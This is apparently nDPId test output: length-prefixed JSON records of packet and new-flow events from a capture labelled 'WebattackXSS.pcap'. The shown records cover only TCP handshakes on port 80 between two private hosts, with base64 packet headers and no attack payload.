-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1499347015165,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347015165,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wXxAAD4GBFSsEAABwKgKMs3yAFDEv9c2AAAAAKACchDdRwAAAgQFtAQCCAoBORZKAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1499347015165,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347015165,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzfKguKOtxL\/XN6AScSCuHQAAAgQFtAQCCAoD4ufAATkWSgEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1499347015166,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347015166,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wX1AAD4GBFusEAABwKgKMs3yAFDEv9c3oLijroAQAOVNJQAAAQEICgE5FkoD4ufA"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347016455,"flow_last_seen":1499347016455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347016455,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52736,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1499347016455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347016455,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hwdAAD4GPsmsEAABwKgKMs4AAFB8BZCLAAAAAKACchBrXQAAAgQFtAQCCAoBOReMAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1499347016455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347016455,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzgBumELLfAWQjKAScSDN8gAAAgQFtAQCCAoD4ukDATkXjAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":453,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1499347016455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347016455,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hwhAAD4GPtCsEAABwKgKMs4AAFB8BZCMbphCzIAQAOVs+gAAAQEICgE5F4wD4ukD"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347017745,"flow_last_seen":1499347017745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347017745,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52750,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1499347017745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347017745,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8p+RAAD4GHeysEAABwKgKMs4OAFCFw78rAAAAAKACchAxrgAAAgQFtAQCCAoBORjPAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1499347017745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347017745,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzg5V15svhcO\/LKAScSBTXgAAAgQFtAQCCAoD4upFATkYzwEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1499347017746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347017746,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0p+VAAD4GHfOsEAABwKgKMs4OAFCFw78sVdebMIAQAOXyZQAAAQEICgE5GM8D4upF"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347020329,"flow_last_seen":1499347020329,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347020329,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1499347020329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347020329,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8BsFAAD4Gvw+sEAABwKgKMs4oAFCq7R2UAAAAAKACchCrewAAAgQFtAQCCAoBORtVAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1499347020329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347020329,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzijgzD+Kqu0dlaAScSCbVAAAAgQFtAQCCAoD4uzMATkbVQEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1499347020330,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347020330,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0BsJAAD4GvxasEAABwKgKMs4oAFCq7R2V4Mw\/i4AQAOU6XAAAAQEICgE5G1UD4uzM"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347021621,"flow_last_seen":1499347021621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347021621,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52790,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1499347021621,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347021621,"pkt":"ABm5CmnxAMGxFOsxCABFAAA899BAAD4Gzf+sEAABwKgKMs42AFBUD+tIAAAAAKACchAzVAAAAgQFtAQCCAoBORyYAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1499347021621,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347021621,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzjY7BBUuVA\/rSaAScSDyDwAAAgQFtAQCCAoD4u4OATkcmAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1499347021622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347021622,"pkt":"ABm5CmnxAMGxFOsxCABFAAA099FAAD4GzgasEAABwKgKMs42AFBUD+tJOwQVL4AQAOWRFwAAAQEICgE5HJgD4u4O"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":514,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347024196,"flow_last_seen":1499347024196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347024196,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1499347024196,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347024196,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zI9AAD4G+UCsEAABwKgKMs5QAFAU3NOUAAAAAKACchCHngAAAgQFtAQCCAoBOR8bAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1499347024196,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347024196,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzlADb\/iqFNzTlaAScSCX7gAAAgQFtAQCCAoD4vCSATkfGwEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1499347024197,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347024197,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zJBAAD4G+UesEAABwKgKMs5QAFAU3NOVA2\/4q4AQAOU29QAAAQEICgE5HxwD4vCS"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":523,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347025509,"flow_last_seen":1499347025509,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347025509,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52830,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1499347025509,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347025509,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MX5AAD4GlFKsEAABwKgKMs5eAFDxhxEaAAAAAKACchBsFgAAAgQFtAQCCAoBOSBkAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1499347025510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347025510,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzl7gFzLu8YcRG6AScSBkMQAAAgQFtAQCCAoD4vHbATkgZAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1499347025510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347025510,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MX9AAD4GlFmsEAABwKgKMs5eAFDxhxEb4Bcy74AQAOUDOQAAAQEICgE5IGQD4vHb"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347028086,"flow_last_seen":1499347028086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347028086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1499347028086,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347028086,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aaVAAD4GXCusEAABwKgKMs54AFBiKUtNAAAAAKACchC+owAAAgQFtAQCCAoBOSLoAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1499347028086,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347028086,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQznggYwiEYilLTqAScSCeWQAAAgQFtAQCCAoD4vRfATki6AEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1499347028087,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347028087,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aaZAAD4GXDKsEAABwKgKMs54AFBiKUtOIGMIhYAQAOU9YQAAAQEICgE5IugD4vRf"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":553,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347029372,"flow_last_seen":1499347029372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347029372,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52870,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1499347029372,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347029372,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qGFAAD4GHW+sEAABwKgKMs6GAFAx0YxIAAAAAKACchCssQAAAgQFtAQCCAoBOSQpAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1499347029372,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347029372,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzoZSq4KNMdGMSaAScSDe1AAAAgQFtAQCCAoD4vWgATkkKQEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1499347029373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347029373,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qGJAAD4GHXasEAABwKgKMs6GAFAx0YxJUquCjoAQAOV92wAAAQEICgE5JCoD4vWg"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347030639,"flow_last_seen":1499347030639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347030639,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1499347030639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347030639,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jW9AAD4GOGGsEAABwKgKMs6UAFA36qgJAAAAAKACchCJjAAAAgQFtAQCCAoBOSVmAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1499347030639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347030639,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzpQiO+l4N+qoCqAScSCD9wAAAgQFtAQCCAoD4vbdATklZgEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1499347030640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347030640,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jXBAAD4GOGisEAABwKgKMs6UAFA36qgKIjvpeYAQAOUi\/wAAAQEICgE5JWYD4vbd"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347033203,"flow_last_seen":1499347033203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347033203,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1499347033203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347033203,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AN5AAD4GxPKsEAABwKgKMs6uAFDsGCc5AAAAAKACchBTkwAAAgQFtAQCCAoBOSfnAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1499347033204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347033204,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzq5aBdhx7BgnOqAScSAkugAAAgQFtAQCCAoD4vleATkn5wEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1499347033204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347033204,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0AN9AAD4GxPmsEAABwKgKMs6uAFDsGCc6WgXYcoAQAOXDwQAAAQEICgE5J+cD4vle"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347034467,"flow_last_seen":1499347034467,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347034467,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1499347034467,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347034467,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rP1AAD4GGNOsEAABwKgKMs68AFB+VYXeAAAAAKACchBhZwAAAgQFtAQCCAoBOSkjAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1499347034467,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347034467,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzrxiNhMTflWF36AScSDufwAAAgQFtAQCCAoD4vqaATkpIwEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1499347034468,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347034468,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rP5AAD4GGNqsEAABwKgKMs68AFB+VYXfYjYTFIAQAOWNhwAAAQEICgE5KSMD4vqa"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347035750,"flow_last_seen":1499347035750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347035750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52938,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 